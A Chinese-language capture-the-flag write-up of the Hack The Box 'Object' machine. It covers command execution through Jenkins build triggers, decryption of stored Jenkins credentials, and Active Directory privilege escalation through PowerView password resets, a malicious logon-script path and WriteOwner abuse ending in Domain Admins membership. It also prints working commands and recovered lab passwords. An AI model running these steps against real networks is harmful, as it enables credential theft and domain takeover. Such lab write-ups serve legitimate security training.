【Hack The Box】windows练习-- Object
创始人
2024-01-29 09:33:44
0

HTB 学习笔记

【Hack The Box】windows练习-- Object


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • HTB 学习笔记
    • 信息收集
    • 我看80
    • 利用config.xml
    • ForceChangePassword
    • GenericWrite
        • 普遍方式
        • 在某些情况下也可以导致用户密码修改
        • GenericWrite在用户上更新他们的登录脚本
    • 表格信息查看
    • WriteOwner

在这里插入图片描述

信息收集

80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http    Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds

web(两个),winrm,

我看80

有个自动化服务器
在这里插入图片描述在这里插入图片描述
所以我将添加这个域,但是因为没有展现出子域。我将爆破

wfuzz -u http://object.htb -H 'Host: FUZZ.object.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 29932

但是没有结果

在这里插入图片描述
所以可以证明存在admin用户,但是也没啥用,我们注册个正常的,看看前面说的那个自动化的是个什么东西

在这里插入图片描述

页面源码中没有version相关信息,那注册登陆进去应该会有控制板啥的,可以找找,但是没有对应的exp
在这里插入图片描述2.317
但是search并没有任何负荷的信息

在这里插入图片描述

然后保存之后我发现我找不到我需要的东西

接着我在主页面左侧的设置栏中似乎可以看到设置触发器
可以设置计划任务

![在这里插入图片描述](https://img-blog.csdnimg.cn/d1c70660623d4fd0981ae04535fb2714.png
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述鼠标放上去悬浮小箭头,发现可以执行命令,那就完事了,开始反弹shell就行
在这里插入图片描述
但是我建立smbshare的方法他报错了,显示无法连接,猜测可能是防火墙限制出站规则

我将新建一个项目去查看防火墙规则

powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block

步骤一致


Name                  : {D6399A8B-5E04-458F-AA68-62F64A4F1F43}
DisplayName           : BlockOutboundDC
Description           : 
DisplayGroup          : 
Group                 : 
Enabled               : True
Profile               : Any
Platform              : {}
Direction             : Outbound
Action                : Block
EdgeTraversalPolicy   : Block
LooseSourceMapping    : False
LocalOnlyMapping      : False
Owner                 : 
PrimaryStatus         : OK
Status                : The rule was parsed successfully from the store. (65536)
EnforcementStatus     : NotApplicable
PolicyStoreSource     : PersistentStore
PolicyStoreSourceType : Local

接着通过如下命令脚本
查看详细的防火墙策略

powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Enabled,Profile,
Direction,Action"

我将修正格式,防止换行符

回显如下
可以看到所有的端口都被搞了

DisplayName     Protocol LocalPort RemotePort RemoteAddress Enabled Profile Direction Action
-----------     -------- --------- ---------- ------------- ------- ------- --------- ------
BlockOutboundDC TCP      Any       Any        Any              True     Any  Outbound  Block

powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
这样来寻找例外

但是一无所获

利用config.xml

这是一点点找出来的
每一次新建命令执行dir之类的

type …\users\admin_17207690984073220035\config.xml


10adminadmin320a60b9-1e5c-4399-8afe-44466c9cde9eoliver{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}falseallfalsefalsedefaultea75b5bd80e4763etrue#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoWadmin@object.localauthenticated1634793332195

在这里插入图片描述里面有几个密码
bse64的和md5的

提取james的密码有两种方法,一种是script,但是我们无法访问,一般人都无法访问
一种就是从config.xml中提取

需要这么些个东西

config.xml
master.key
hudson.util.Secret

$JENKINS_HOME/credentials.xml
$JENKINS_HOME/secrets/master.key
$JENKINS_HOME/secrets/hudson.util.Secret
$JENKINS_HOME/jobs/example-folder/config.xml - Possible location

也是慢慢找,也可以用全局搜索,但是一般来说james目录下有secret,里面就是
一个是单纯的字符串,另一个是可执行文件,我们要对他编码

powershell -c cat ..\..\secrets\master.key 拿到本地校验一下
wc -c master.key 应该是256位

hudson.util.Secret是一个二进制文件,我们可以base64编码后再回来解码打开

powershell -c [convert]::ToBase64String((cat ..\..\secrets\hudson.util.Secret -Encoding byte)) 

在这里插入图片描述
在这里插入图片描述额。。。

用这个go文件的,py的不好用,会报错

https://github.com/hoto/jenkins-credentials-decryptor/releases/tag/1.2.0
执行如下./jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml 

得到密码
c1cdfun_d2434

登陆

evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434

在这里插入图片描述
我服了,bloodhound用不了
说是版本问题
去他们的
https://github.com/BloodHoundAD/SharpHound/releases
去这里下载1.0.3的exe

上传之后直接执行
.\sharphound.exe -c all

在这里插入图片描述

在这里插入图片描述
新版的blood也能识别,我用的1.0.3的exe,新版的bloodhound
没啥问题

先设置成已拥有用户

在这里插入图片描述然后设置这个
在这里插入图片描述
在这里插入图片描述
所以我们先改了smith的密码

ForceChangePassword

shell 作为 oliver,所以我不需要通过该凭证。

利用就这样,直接改掉smith的密码

upload PowerView.ps1
. .\PowerView.ps1
$newpass = ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force
Set-DomainUserPassword -Identity smith -AccountPassword $newpassevil-winrm -i 10.129.15.97 -u smith -p '0xdf0xdf!'

在这里插入图片描述
在这里插入图片描述
然后把smith设置为拥有,刚才那个取消设置
然后再查看同样的信息

GenericWrite

普遍方式

我将向 maria(目标用户) 的帐户添加一个 SPN:
要利用 Kerberoast,我需要使用具有 有效格式 的 SPN
通常情况下
添加
Set-DomainObject -Identity maria -SET @{serviceprincipalname=‘nonexistent/0XDF’}
查看
Get-DomainUser maria | Select serviceprinciplename

可是这在这里却失败了

在某些情况下也可以导致用户密码修改

$newpass = ConvertTo-SecureString ‘0xdf0xdf!’ -AsPlainText -Force
Set-DomainUserPassword -Identity maria -AccountPassword $newpass
但这同样失败

GenericWrite在用户上更新他们的登录脚本

1. 导入模块
Import-Module .\PowerView.ps1
2. 本地监听验证
sudo tcpdump -ni tun0 icmp
3. 写入
echo "ping 10.10.14.12" > ping.ps1
4. 执行
Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\ping.ps1"}

在这里插入图片描述

echo "ls \users\maria\ > \programdata\out" > cmd.ps1Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}

在这里插入图片描述注意到一个时间异常

d-r— 10/25/2021 10:07 PM Documents

echo "ls \users\maria\documents > \programdata\out; ls \users\maria\desktop\ > \programdata\out2" > cmd.ps1

在这里插入图片描述
在这里插入图片描述

echo "copy \users\maria\desktop\Engines.xls \programdata\" > cmd.ps1 
download C:\programdata\Engines.xls Engines.xls

表格信息查看

在这里插入图片描述

crackmapexec winrm 10.10.11.132 -u maria -p maria-pass

我将测试哪一个能登陆,当然手测也可以,反正就三个

evil-winrm -i 10.10.11.132 -u maria -p 'W3llcr4ft3d_4cls'

在这里插入图片描述

WriteOwner

这意味着 maria 可以更改组的所有者。

upload PowerView.ps1
Import-Module .\PowerView.ps11。 设置为组所有者
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'2. 给自己授予全部权限
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All3. 把自己添加到dbadmin
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

net user maria

在这里插入图片描述
在这里插入图片描述
但是现在查看依旧我不在组中,这是因为一个常见问题,就是更新的问题
我们可以退出再进,如果还是不行那就没办法了,要重启,无限循环

在这里插入图片描述
我已经可以拿到root.txt了
完毕

相关内容

热门资讯

小工厂管理员工的最好方法,小工...   *此文留给有缘人,请收藏转发,谢谢!      _1.从金融市场看公司管理,借鉴龙头企业的管理模...
老板是怎么创业的,老板的创业历...   普通人创业一定不要做你不擅长的事情。别人说的再好,一开始也轮不到你受益。即使有好的东西,也是有风...
售货店创业模式,无人售货店创新...   继续更新。谢谢你的等待。      很多粉丝在后台留言,说我主页上的文章他们都看了,或者2-3遍...
就业创业辩论赛发言,毕业后先创...   每年到了毕业季,求职者心里都会有冲突。我应该选择自己喜欢的工作还是申请高薪职位?        ...
女人创业做什么最吃香,创业需要...   #一      理财,对于很多人来说,总认为现在没钱,所以没必要理财。有句话说你不理财,钱不理你...
芋见甜品官网,芋姐带你餐饮创业...         没有芋头怎么说芋头?有点太q弹了,但是家里没有芋头和红薯,我想吃甜点。只要水温足够热...
天谕手游机缘巧合任务,天谕手游...   #电商、互联网资讯            1、2019天猫双11,商家官方群、淘宝直播等工具赋能...
创业板新股如何申购,创业板申购...   根据初步安排,本周(9月27日-9月30日),a股市场将迎来8只新股认购。上述8只新股中,上海主...
河北社交电商app平台,唐山社...   买水果,送快递,印刷材料.如今,对于唐山市万达小区等小区的业主来说,生活琐事已经成为下楼散步时简...
阿里收购饿了么赚钱吗,饿了么资...         机会总是留给有准备的人。      随着互联网的发展,人们的生活方式发生了巨大的改变...